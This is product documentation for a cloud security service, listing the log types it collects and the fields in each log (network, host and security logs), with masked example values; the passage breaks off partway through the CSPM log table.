All Products
Search
Document Center

Security Center:Log types and log fields of the V1.0 log dictionaries

Last Updated:Dec 13, 2024

You can view Security Center logs to identify, investigate, and handle security events at the earliest opportunity. After you purchase log storage capacity, Security Center automatically collects security logs of security events, network logs of network traffic, and host logs of host behavior. This topic describes the types of logs supported by Security Center V1.0 log dictionaries and the fields in each type of log.

Log types supported by different editions

The security capabilities and supported log types vary based on the editions of Security Center. In full protection mode, the available log types are determined by the Security Center edition you purchase. In partial protection mode, where quota management is supported, the log types are based on the Security Center edition bound to the server. The following table outlines the log types supported by different editions:

Editions

Supported log types

Enterprise Edition and Ultimate Edition

All log types

Anti-virus Edition and Advanced Edition

All host logs and security logs

Unbound authorized servers

  • Network log

    Note

    Network logs are only supported for users of the Enterprise Edition or Ultimate Edition on unbound authorized servers. Users of the Anti-virus Edition or Advanced Edition cannot log network data on unbound authorized servers.

    • Web access logs

    • DNS logs

    • Network session logs

    • Local DNS logs

  • Host log

    • Agent event logs

  • Security log

    • Vulnerability logs (only vulnerabilities supported by the Basic edition are recorded)

    • Alert logs (only alerts supported by the Basic edition are recorded)

    • CSPM logs (logs are only recorded after you use the Cloud Security Posture Management feature)

    • Application protection logs (logs are only recorded after you use the application protection feature)

    • Malicious file detection logs (logs are only recorded after you use the malicious file detection feature)

    • Core file monitoring event log (alert events are only recorded in the logs after you use the core file monitoring feature)

Log types supported by different editions

The security capabilities and supported log types vary based on the editions of Security Center. In full protection mode, the available log types are determined by the Security Center edition you purchase. In partial protection mode, where quota management is supported, the log types are based on the Security Center edition bound to the server. The following table outlines the log types supported by different editions:

Editions

Supported log types

Enterprise Edition and Ultimate Edition

All log types

Anti-virus Edition and Advanced Edition

All host logs and security logs

Unbound authorized servers

  • Network log

    Note

    Network logs are only supported for users of the Enterprise Edition or Ultimate Edition on unbound authorized servers. Users of the Anti-virus Edition or Advanced Edition cannot log network data on unbound authorized servers.

    • Web access logs

    • DNS logs

    • Network session logs

    • Local DNS logs

  • Host log

    • Agent event logs

  • Security log

    • Vulnerability logs (only vulnerabilities supported by the Basic edition are recorded)

    • Alert logs (only alerts supported by the Basic edition are recorded)

    • CSPM logs (logs are only recorded after you use the Cloud Security Posture Management feature)

    • Application protection logs (logs are only recorded after you use the application protection feature)

    • Malicious file detection logs (logs are only recorded after you use the malicious file detection feature)

    • Core file monitoring event log (alert events are only recorded in the logs after you use the core file monitoring feature)

Log types

Network log types

Note

Network logs are not supported in the Outside China data management center.

Log type

__topic__

Description

Collection cycle

Web access logs

sas-log-http

Logs of user requests to web servers and responses from the web servers, including the IP address of the user, request time, request method, request URL, HTTP status code, and response size.

Web access logs are used to analyze web traffic and user behavior, identify access patterns and exceptions, and optimize website performance.

In most cases, logs are collected 1 to 12 hours after the logs are generated.

Domain Name System (DNS) logs

sas-log-dns

Logs of DNS resolution details, including the requested domain name, query type, IP address of the client, and response value.

You can monitor the request and response process of DNS resolution, and identify abnormal resolution behavior, DNS hijacking, and DNS poisoning based on DNS logs.

Internal DNS logs

local-dns

Logs of DNS queries and responses on the local DNS server, including the requested domain name, query type, IP address of the client, and response value.

You can obtain the information about DNS queries in your network, and identify issues such as abnormal query behavior, domain hijacking, and DNS poisoning based on internal DNS logs.

Network session logs

sas-log-session

Logs of network connections and data transmission, including the details of network sessions. The details include the session start time, source IP address, destination IP address, protocol, and ports.

Network session logs are generally used to monitor network traffic, identify potential threats, and optimize network performance.

Host log types

Log type

__topic__

Description

Collection cycle

Logon logs

aegis-log-login

Logs of user logons to servers, including the logon time, logon user, logon method, and logon IP address.

Logon logs can help you monitor user activities, and identify and respond to abnormal behavior at the earliest opportunity. This helps ensure system security.

Note

Security Center does not collect the logs of logons to servers that run Windows Server 2008.

Logs are collected in real time.

Network connection logs

aegis-log-network

Logs of network connections, including the 5-tuples of connections to servers, connection time, and connection status.

Network connection logs can help you detect suspicious connections, identify potential network attacks, and optimize network performance.

Note
  • A server collects only some states of network connections from establishment to termination.

  • Incoming traffic is not logged.

Logs are collected in real time.

Process startup logs

aegis-log-process

Logs of server process startups, including the startup time, startup command, and parameters.

You can obtain the startup status and configurations of server processes, and identify issues such as abnormal processes, malware intrusion, and threats based on process startup logs.

Logs are collected in real time. When a process starts, the logs are immediately collected.

Brute-force attack logs

aegis-log-crack

Logs of brute-force attacks, including information about logon attempts, and attempts to crack systems, applications, or accounts.

You can obtain the information about brute-force attacks on systems or applications, and identify unusual logon attempts, weak passwords, and credential leaks based on brute-force attack logs. You can also use brute-force attack logs to trace malicious users and collect evidence to assist the security team in incident response and investigation.

Logs are collected in real time.

Account snapshot logs

aegis-snapshot-host

Logs of accounts in systems or applications, including the basic information about accounts. The basic information includes the username, password policy, and logon history of an account.

You can obtain the changes of accounts and identify potential risks at the earliest opportunity by comparing the account snapshot logs at different points in time. The risks include access from unauthorized accounts and abnormal account status.

  • If you configure an automatic collection task for asset fingerprints, asset fingerprints are automatically collected based on the specified frequency. For more information about how to configure an automatic collection task for asset fingerprints, see Use the asset fingerprints feature.

  • If you do not configure an automatic collection task, fingerprints of each server are collected once a day at random time.

Network snapshot logs

aegis-snapshot-port

Logs of network connections, including the 5-tuples of connections, connection status, and associated processes.

You can obtain the information about network sockets in the system, identify abnormal connections and potential network attacks, and optimize network performance based on network snapshot logs.

Process snapshot logs

aegis-snapshot-process

Logs of processes in the system, including the process ID, process name, and process start time.

You can obtain the information about processes in the system and resource usage of the processes, and identify issues such as abnormal processes, excessive CPU utilization, and memory leaks based on process snapshot logs.

DNS request logs

aegis-log-dns-query

Logs of DNS requests sent by servers, including the requested domain name, query type, and query source.

You can obtain the information about DNS queries in the network, and identify issues such as abnormal queries, domain hijacking, and DNS poisoning based on DNS request logs.

Logs are collected in real time.

Agent event logs

aegis-log-client

Logs of online and offline events of the Security Center agent.

Logs are collected in real time.

Security log types

Log type

__topic__

Description

Collection cycle

Vulnerability logs

sas-vul-log

Logs of vulnerabilities that are detected in the systems or applications, including the vulnerability name, vulnerability status, and handling action.

You can obtain the information about the vulnerabilities, security risks, and attack trends in the system, and take proper measures at the earliest opportunity based on vulnerability logs.

Logs are collected in real time.

Baseline logs

sas-hc-log

Logs of baseline check results, including the baseline severity, baseline type, and risk level.

You can obtain the baseline security status and potential risks in the system based on baseline logs.

Note

The logs record only the data of check items that fail the check the first time and the data of the check items that have passed the previous checks but failed a new check.

Alert logs

sas-security-log

Logs of security events and alerts generated in the system and applications, including the alert data source, alert detail, and alert level.

You can obtain the security events and threats in the system and take proper measures at the earliest opportunity based on alert logs.

CSPM logs

sas-cspm-log

Logs related to CSPM, including the check results of CSPM and the operations that add risk items to the whitelist.

You can obtain the information about the errors and potential risks in the configurations of cloud services based on CSPM logs.

Network defense logs

sas-net-block

Logs of network attack events, including key information such as the attack type, source IP address, and destination IP address.

You can obtain network security events and implement proper response and defense measures to improve network security and reliability based on network defense logs.

Application protection logs

sas-rasp-log

Logs of attacks on applications, including key information such as the attack type, attack pattern, and attacker IP address.

You can obtain the information about the security events that occur in applications and implement proper response and defense measures to improve application security and reliability based on application protection logs.

Malicious file detection logs

sas-filedetect-log

Logs of malicious file detection, including the file information, detection scenario, and detection result.

You can identify common viruses such as ransomware and mining programs in offline files and Object Storage Service (OSS) objects, and handle the viruses at the earliest opportunity to prevent the spread and execution of malicious files based on the logs.

Network logs

Important

Only Security Center Enterprise and Ultimate support network logs.

Web access logs

Field name

Description

Example

content_length

The length of the message body. Unit: bytes.

612

dst_ip

The IP address of the destination host.

39.105.XX.XX

dst_port

The port of the destination host.

80

host

The IP address or domain name of the destination host.

39.105.XX.XX

jump_location

The redirection address.

123

method

The HTTP request method.

GET

referer

The HTTP referer. The field contains the URL of the web page that is linked to the resource being requested.

www.example.com

request_datetime

The time when the request is initiated.

2023-08-07 22:42:41

ret_code

The HTTP status code.

200

rqs_content_type

The type of the request content.

text/plain;charset=utf-8

rsp_content_type

The type of the response content.

text/plain; charset=utf-8

src_ip

The source IP address.

31.220.XX.XX

src_port

The source port.

59524

uri

The request URI.

/report

user_agent

The user agent that initiates the request.

okhttp/3.2.0

x_forward_for

The HTTP request header that records the originating IP address of the client.

31.220.XX.XX

DNS logs

Field name

Description

Example

additional

The additional field that is returned by the DNS server and records information such as the CNAME record, MX record, and PTR record.

N/A

additional_num

The number of additional records returned by the DNS server.

0

answer

The DNS answer returned by the DNS server, which indicates the resolution results. A DNS answer contains the IP address to which the requested domain name is resolved or other information such as the A record and the AAAA record.

example.com A IN 52 1.2.XX.XX

answer_num

The number of DNS answers.

1

authority

The authority field returned by the DNS server. An authority is the DNS server that manages and resolves the domain name. An authority field contains information about a DNS server that provides the DNS record for the requested domain name, such as the NS record.

NS IN 17597

authority_num

The number of authorities.

1

client_subnet

The subnet of the client.

59.152.XX.XX

dst_ip

The destination IP address.

106.55.XX.XX

dst_port

The destination port.

53

in_out

The direction of data transmission. Valid values:

  • in: request to the DNS server

  • out: response from the DNS server

out

qid

The ID of the query.

13551

qname

The domain name that is queried.

example.com

qtype

The type of the query.

A

query_datetime

The time of the query.

2023-08-25 09:59:15

rcode

The response code returned by the DNS server, which indicates the DNS resolution result.

0

region

The ID of the source region. Valid values:

  • 1: China (Beijing)

  • 2: China (Qingdao)

  • 3: China (Hangzhou)

  • 4: China (Shanghai)

  • 5: China (Shenzhen)

  • 6: other regions

1

response_datetime

The response time of the DNS server.

2023-08-25 09:59:16

src_ip

The source IP address.

106.11.XX.XX

src_port

The source port.

22

Internal DNS logs

Field name

Description

Example

answer_rda

The resource data area (RDA) field of the DNS answer, which indicates the specific value of the resolution result.

106.11.XX.XX

answer_ttl

The time to live (TTL) of the DNS answer. Unit: seconds.

600

answer_type

The type of the DNS answer. Valid values:

  • 1: A record

  • 2: NS record

  • 5: CNAME record

  • 6: SOA record

  • 10: NULL record

  • 12: PTR record

  • 15: MX record

  • 16: TXT record

  • 25: KEY record

  • 28: AAAA record

  • 33: SRV record

  • 41: OPT record

  • 43: DS record

  • 44: SSHFP record

  • 45: IPSECKEY record

  • 46: RRSIG record

  • 47: NSEC record

1

anwser_name

The name of the DNS answer, which indicates the domain name associated with the resource record.

example.com

dest_ip

The destination IP address. The value is a decimal IP address by default.

323223****

dest_port

The destination port.

53

group_id

The group ID. The same group ID indicates the same DNS request or response.

3

hostname

The name of the host.

hostname

id

The ID of the query, which identifies a DNS request or DNS response.

64588

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address that is included in the DNS request or response.

121.40.XX.XX

ip_ttl

The TTL of the IP packet in the DNS request or response.

64

query_name

The domain name that is queried.

example.com

query_type

The type of the query. Valid values:

  • 1: A record

  • 2: NS record

  • 5: CNAME record

  • 6: SOA record

  • 10: NULL record

  • 12: PTR record

  • 15: MX record

  • 16: TXT record

  • 25: KEY record

  • 28: AAAA record

  • 33: SRV record

1

src_ip

The IP address from which the DNS request or response is initiated. The value is a decimal IP address by default.

168427****

src_port

The number of the port from which the DNS request or response is initiated.

53

time

The timestamp of the DNS request or response. Unit: seconds.

1537840756

time_usecond

The timestamp of the DNS request or response. Unit: microseconds.

49069

tunnel_id

The ID of the tunnel used by the DNS request or response. Tunneling is a way to transfer data by using different protocols. Tunneling can be used for secure access to the Internet or for communications across different networks.

514763

Network session logs

Field name

Description

Example

asset_type

The type of the asset from which the logs are collected. Valid values:

  • ECS: Elastic Compute Service (ECS) instance

  • SLB: Server Load Balancer (SLB) instance

  • NAT: NAT Gateway

ECS

dst_ip

The destination IP address.

119.96.XX.XX

dst_port

The destination port.

443

in_out

The direction of the session. The value is fixed as out.

  • If the value of the proto field is tcp, the value of this field indicates an outbound request.

  • If the value of the proto field is udp, the value of this field does not indicate the direction of the request and is for reference only.

out

proto

The type of the protocol. Valid values:

  • tcp

  • udp

tcp

session_time

The time when the session starts.

2023-08-15 09:59:49

src_ip

The source IP address.

121.40.XX.XX

src_port

The source port.

53602

Host logs

Logon logs

Field name

Description

Example

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

sas_group_name

The asset group to which the server belongs in Security Center.

default

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

warn_ip

The IP address that is used to log on to the server.

221.11.XX.XX

warn_port

The port that is used to log on to the server.

22

warn_type

The logon type. Valid values:

  • SSHLOGIN and SSH: SSH logon

  • RDPLOGIN: remote desktop logon

  • IPCLOGIN: IPC connection logon

SSH

warn_user

The username that is used for logon.

admin

warn_count

The number of logon attempts.

The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the warn_count field is 3, three logon attempts were made within 1 minute.

3

Network connection logs

Field name

Description

Example

cmd_chain

The process chain.

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

The index of the process chain. You can use an index to search for a process chain.

B184

container_hostname

The name of the server in the container.

nginx-ingress-controller-765f67fd4d-****

container_id

The container ID.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

The image ID.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

The image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

The container name.

nginx-ingress-****

container_pid

The ID of the process in the container.

0

dir

The direction of the network connection. Valid values:

  • in

  • out

in

dst_ip

The destination IP address.

  • If the value of dir is out, the value of this field is the IP address of the peer host.

  • If the value of dir is in, the value of this field is the IP address of your host.

192.168.XX.XX

dst_port

The destination port.

443

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

parent_proc_file_name

The name of the parent process file.

/usr/bin/bash

pid

The ID of the process.

14275

ppid

The parent process ID.

14268

proc_name

The name of the process.

nginx

proc_path

The path to the process.

/usr/local/nginx/sbin/nginx

proc_start_time

The time when the process was started.

N/A

proto

The protocol. Valid values:

  • tcp

  • udp

  • raw, which indicates raw socket

tcp

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address.

100.127.XX.XX

src_port

The source port.

41897

srv_comm

The command name associated with the parent process of the parent process.

containerd-shim

status

The status of the network connection. Valid values:

  • 1: The connection is closed.

  • 2: The connection is to be established.

  • 3: The SYN packet is sent.

  • 4: The SYN packet is received.

  • 5: The connection is established.

  • 6: The connection is waiting to be closed.

  • 7: The connection is being closed.

  • 8: The local endpoint is waiting for an acknowledgment of the connection termination request from the peer endpoint.

  • 9: The local endpoint is waiting for a connection termination request from the peer endpoint after it has received the acknowledgement from the peer endpoint.

  • 10: The local endpoint is waiting for enough time to elapse to ensure that the peer endpoint receives the acknowledgment from the local endpoint.

  • 11: The transmission control block (TCB) for the connection is deleted.

5

type

The type of the real-time network connection. Valid values:

  • connect: TCP connection initiated

  • accept: TCP connection received

  • listen: port listening

listen

uid

The ID of the user who started the process.

101

username

The name of the user who started the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

Process startup logs

Field name

Description

Example

cmd_chain

The process chain.

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

The index of the process chain. You can use an index to search for a process chain.

B184

cmd_index

The index of a parameter in the command line. Every two indexes are grouped to identify the start of a parameter and the end of the parameter.

0,3,5,8

cmdline

The complete command to start the process.

ipset list KUBE-6-CLUSTER-IP

comm

The command name related to the process.

N/A

container_hostname

The name of the server in the container.

nginx-ingress-controller-765f67fd4d-****

container_id

The container ID.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

The image ID.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

The image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

The container name.

nginx-ingress-****

containerpid

The ID of the process in the container.

0

cwd

The current working directory (CWD) of the process.

N/A

filename

The name of the process file.

ipset

filepath

The full path to the process file.

/usr/sbin/ipset

gid

The ID of the process group.

0

groupname

The name of the user group.

group1

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

parent_cmd_line

The command line of the parent process.

/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX

pfilename

The name of the parent process file.

kube-proxy

pfilepath

The full path to the parent process file.

/usr/local/bin/kube-proxy

pid

The ID of the process.

14275

ppid

The parent process ID.

14268

pstime

The time when the parent process was started.

2023-08-09 14:19:00

sas_group_name

The asset group to which the server belongs in Security Center.

default

srv_cmd

The command line of the ancestor process.

/usr/bin/containerd

tty

The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons.

N/A

uid

The user ID.

123

uid

The ID of the user who started the process.

101

username

The name of the user who started the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

Brute-force attack logs

Field name

Description

Example

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server that is under a brute-force attack.

192.168.XX.XX

sas_group_name

The asset group to which the server belongs in Security Center.

default

uuid

The UUID of the server that is under a brute-force attack.

5d83b26b-b7ca-4a0a-9267-12*****

warn_count

The number of failed logon attempts.

The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the warn_count field is 3, three logon attempts were made within 1 minute.

3

warn_ip

The source IP address.

47.92.XX.XX

warn_port

The logon port.

22

warn_type

The logon type. Valid values:

  • SSHLOGIN and SSH: SSH logon

  • RDPLOGIN: remote desktop logon

  • IPCLOGIN: IPC connection logon

SSH

warn_user

The username that is used for logon.

user

Account snapshot logs

Field name

Description

Example

account_expire

The date when the account expires. The value never indicates that the account never expires.

never

domain

The domain or directory to which the account belongs. The value N/A indicates that the account does not belong to a domain.

N/A

groups

The group to which the account belongs. The value N/A indicates that the account does not belong to a group.

["nscd"]

home_dir

The home directory, which is the default directory to store and manage files in the system.

/Users/abc

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

last_chg

The date when the password was last changed.

2022-11-29

last_logon

The date and time of the last logon that is initiated by using the account. The value N/A indicates that the account has not been used for logons.

2023-08-18 09:21:21

login_ip

The IP address from which the last remote logon was initiated by using the account. The value N/A indicates that the account has not been used for logons.

192.168.XX.XX

passwd_expire

The date when the password expires. The value never indicates that the password never expires.

2024-08-24

perm

Indicates whether the account has root permissions. Valid values:

  • 0: no

  • 1: yes

0

sas_group_name

The asset group to which the server belongs in Security Center.

default

shell

The Linux shell command.

/sbin/nologin

status

The status of the account. Valid values:

  • 0: Logons from the account are not allowed.

  • 1: Logons from the account are allowed.

0

tty

The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons.

N/A

user

The name of the user.

nscd

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

warn_time

The date when you are notified of expiring passwords. The value never indicates that no notifications are sent.

2024-08-20

Network snapshot logs

Field name

Description

Example

dir

The direction of the network connection. Valid values:

  • in

  • out

in

dst_ip

The destination IP address.

  • If the value of dir is out, the value of this field is the IP address of the peer host.

  • If the value of dir is in, the value of this field is the IP address of your host.

192.168.XX.XX

dst_port

The destination port.

443

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

pid

The ID of the process.

682

proc_name

The name of the process.

sshd

proto

The protocol. Valid values:

  • tcp4: TCP connections over IPv4 addresses

  • tcp6: TCP connections over IPv6 addresses

  • udp4: UDP connections over IPv4 addresses

  • udp6: UDP connections over IPv6 addresses

tcp4

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address.

100.127.XX.XX

src_port

The source port.

41897

status

The status of the network connection. Valid values:

  • 1: The connection is closed.

  • 2: The connection is to be established.

  • 3: The SYN packet is sent.

  • 4: The SYN packet is received.

  • 5: The connection is established.

  • 6: The connection is waiting to be closed.

  • 7: The connection is being closed.

  • 8: The local endpoint is waiting for an acknowledgment of the connection termination request from the peer endpoint.

  • 9: The local endpoint is waiting for a connection termination request from the peer endpoint after it has received the acknowledgement from the peer endpoint.

  • 10: The local endpoint is waiting for enough time to elapse to ensure that the peer endpoint receives the acknowledgment from the local endpoint.

  • 11: The TCB for the connection is deleted.

5

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

Process snapshot logs

Field name

Description

Example

cmdline

The complete command to start the process.

/usr/local/share/assist-daemon/assist_daemon

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

md5

The MD5 hash value of the binary file.

Note

The MD5 algorithm is not supported for files that exceed 1 MB in size.

1086e731640751c9802c19a7f53a64f5

name

The name of the process file.

assist_daemon

path

The full path to the process file.

/usr/local/share/assist-daemon/assist_daemon

pid

The ID of the process.

1692

pname

The name of the parent process file.

systemd

sas_group_name

The asset group to which the server belongs in Security Center.

default

start_time

The time when the process started. This is a built-in field.

2023-08-18 20:00:12

uid

The ID of the user who started the process.

101

username

The name of the user who started the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

DNS request logs

Field name

Description

Example

domain

The domain name that is included in the DNS request.

example.aliyundoc.com

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server that initiates the DNS request.

192.168.XX.XX

pid

The ID of the process that initiates the DNS request.

3544

ppid

The ID of the parent process that initiates the DNS request.

3408

proc_cmd_chain

The chain of the process that initiates the DNS request.

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

proc_cmdline

The command line of the process that initiates the DNS request.

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

The path to the process that initiates the DNS request.

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

The asset group to which the server belongs in Security Center.

default

time

The time when the DNS request is captured. In most cases, the value is the point in time when the DNS request is initiated.

2023-08-17 20:05:04

uuid

The UUID of the server that initiates the DNS request.

5d83b26b-b7ca-4a0a-9267-12****

Agent event logs

Field name

Description

Example

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

client_ip

The IP address of the server.

192.168.XX.XX

agent_version

The version of the Security Center agent.

aegis_11_91

last_login

The timestamp of the last logon. Unit: milliseconds.

1716444387617

platform

The type of the operating system. Valid values:

  • windows

  • linux

linux

region_id

The ID of the region in which the server resides.

cn-beijing

status

The status of the Security Center agent. Valid values:

  • online

  • offline

online

Security logs

Vulnerability logs

Field name

Description

Example

alias_name

The alias of the vulnerability.

CESA-2023:1335: openssl Security Update

extend_content

The extended information about the vulnerability.

{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the host.

39.104.XX.XX

intranet_ip

The private IP address of the host.

192.168.XX.XX

machine_name

The name of the host.

hhht-linux-***

name

The name of the vulnerability.

centos:7:cesa-2023:1335

op

The operation on the vulnerability. Valid values:

  • new

  • verify

  • fix

new

status

The status information. Valid values:

  • 1: unfixed

  • 2: fix failed

  • 3: rollback failed

  • 4: fixing

  • 5: rolling back

  • 6: verifying

  • 7: fixed

  • 8: fixed and pending restart

  • 9: rolled back

  • 10: ignored

  • 11: rolled back and pending restart

  • 12: no longer exists

  • 13: expired

1

tag

The tag that is added to the vulnerability. Valid values:

  • oval: Linux software vulnerability

  • system: Windows system vulnerability

  • cms: Web-CMS vulnerability

    Note

    A random string indicates other types of vulnerabilities.

oval

type

The type of the vulnerability. Valid values:

  • sys: Windows system vulnerability

  • cve: Linux software vulnerability

  • cms: Web-CMS vulnerability

  • emg: urgent vulnerability

sys

uuid

The UUID of the server.

ad66133a-dc82-4e5e-9659-a49e3****

Baseline logs

Field name

Description

Example

check_item

The name of the check item.

Set the shortest interval between password changes

check_level

The risk level of the baseline. Valid values:

  • high

  • medium

  • low

medium

check_type

The type of the check item.

Identity authentication

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

level

The severity of the risk item. Valid values:

  • high

  • medium

  • low

medium

op

The operation. Valid values:

  • new

  • verity

new

risk_name

The name of the risk item.

Password compliance check

sas_group_name

The server group to which the server belongs in Security Center. The risk item is detected on the server.

default

status

The status information. Valid values:

  • 1: unfixed

  • 2: fix failed

  • 3: rollback failed

  • 4: fixing

  • 5: rolling back

  • 6: verifying

  • 7: fixed

  • 8: fixed and pending restart

  • 9: rolled back

  • 10: ignored

  • 11: rolled back and pending restart

  • 12: no longer exists

  • 13: expired

1

sub_type_alias

The alias of the subtype in Chinese.

Internationally Agreed Best Practices for Security - Ubuntu 16/18/20/22 Security Baseline Check

sub_type_name

The name of the subtype. For more information about baseline subtypes, see Baseline types and subtypes.

hc_ubuntu16_cis_rules

type_alias

The alias of the check type in Chinese.

Internationally Agreed Best Practices for Security

type_name

The type of the baseline. For more information about baseline types, see Baseline types and subtypes.

cis

uuid

The UUID of the server on which the risk item is detected.

1ad66133a-dc82-4e5e-9659-a49e3****

Alert logs

Field name

Description

Example

data_source

The data source. Valid values:

  • aegis_suspicious_event: host exceptions

  • aegis_suspicious_file_v2: webshells

  • aegis_login_log: unusual logons

  • honeypot: alert events generated by cloud honeypots

  • object_scan: file detection exceptions

  • security_event: Security Center exceptions

  • sas_ak_leak: AccessKey pair leaks

aegis_login_log

detail

The details of the alert.

Note

The value of the detail field in the log varies based on the alert type. If you have questions about the parameters in the detail field when you view alert logs, you can submit a ticket to contact technical support.

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Log on to an ECS instance by using an unusual account","status":0}

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the host.

39.104.XX.XX

intranet_ip

The private IP address of the host.

192.168.XX.XX

level

The risk level of the alert. Valid values:

  • serious

  • suspicious

  • remind

suspicious

name

The name of the alert.

Unusual logon - Logon to an ECS instance by using an unusual account

op

The operation. Valid values:

  • new

  • dealing

  • update

new

status

The status of the alert. Valid values:

  • 0: all

  • 1: pending handling

  • 2: ignored

  • 4: confirmed

  • 8: marked as a false positive

  • 16: being handled

  • 32: handled

  • 64: expired

  • 128: deleted

  • 512: being automatically blocked

  • 513: automatically blocked

1

unique_info

The UUID of the alert.

2536dd765f804916a1fa3b9516b5****

uuid

The UUID of the server on which the alert is generated.

ad66133a-dc82-4e5e-9659-a49e3****

CSPM logs

Field name

Description

Example

check_id

The ID of the check item. You can call the ListCheckResult operation to query the IDs of check items. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services.

11

check_show_name

The name of the check item.

Back-to-origin settings

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

instance_name

The name of the instance.

lsm

instance_result

The impacts of risks. The value is a JSON string.

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}

instance_sub_type

The subtype of the instance. Valid values:

  • If the type of the instance is ECS, the following valid values are supported:

    • INSTANCE

    • DISK

    • SECURITY_GROUP

  • If the type of the instance is Container Registry, the following valid values are supported:

    • REPOSITORY_ENTERPRISE

    • REPOSITORY_PERSON

  • If the type of the instance is Resource Access Management (RAM), the following valid values are supported:

    • ALIAS

    • USER

    • POLICY

    • GROUP

  • If the type of the instance is Web Application Firewall (WAF), the value is fixed as DOMAIN.

  • If the type of the instance is other values, the value is fixed as INSTANCE.

INSTANCE

instance_type

The type of the instance. Valid values:

  • ECS

  • SLB

  • RDS: ApsaraDB RDS

  • MONGODB: ApsaraDB for MongoDB

  • KVSTORE: ApsaraDB for Redis

  • ACR: Container Registry

  • CSK: Container Service for Kubernetes (ACK)

  • VPC: Virtual Private Cloud (VPC)

  • ACTIONTRAIL: ActionTrail

  • CDN: Alibaba Cloud CDN (CDN)

  • CAS: Certificate Management Service (formerly SSL Certificates Service)

  • RDC: Apsara Devops

  • RAM

  • DDOS: Anti-DDoS

  • WAF

  • OSS

  • POLARDB: PolarDB

  • POSTGRESQL: ApsaraDB RDS for PostgreSQL

  • MSE: Microservices Engine (MSE)

  • NAS: File Storage NAS (NAS)

  • SDDP: Sensitive Data Discovery and Protection (SDDP)

  • EIP: Elastic IP Address (EIP)

ECS

region_id

The region ID of the instance.

cn-hangzhou

requirement_id

The requirement item ID. You can call the ListCheckStandard operation to query the IDs of requirement items. The operation is used to query the standards of configuration checks.

5

risk_level

The risk level. Valid values:

  • LOW

  • MEDIUM

  • HIGH

MEDIUM

section_id

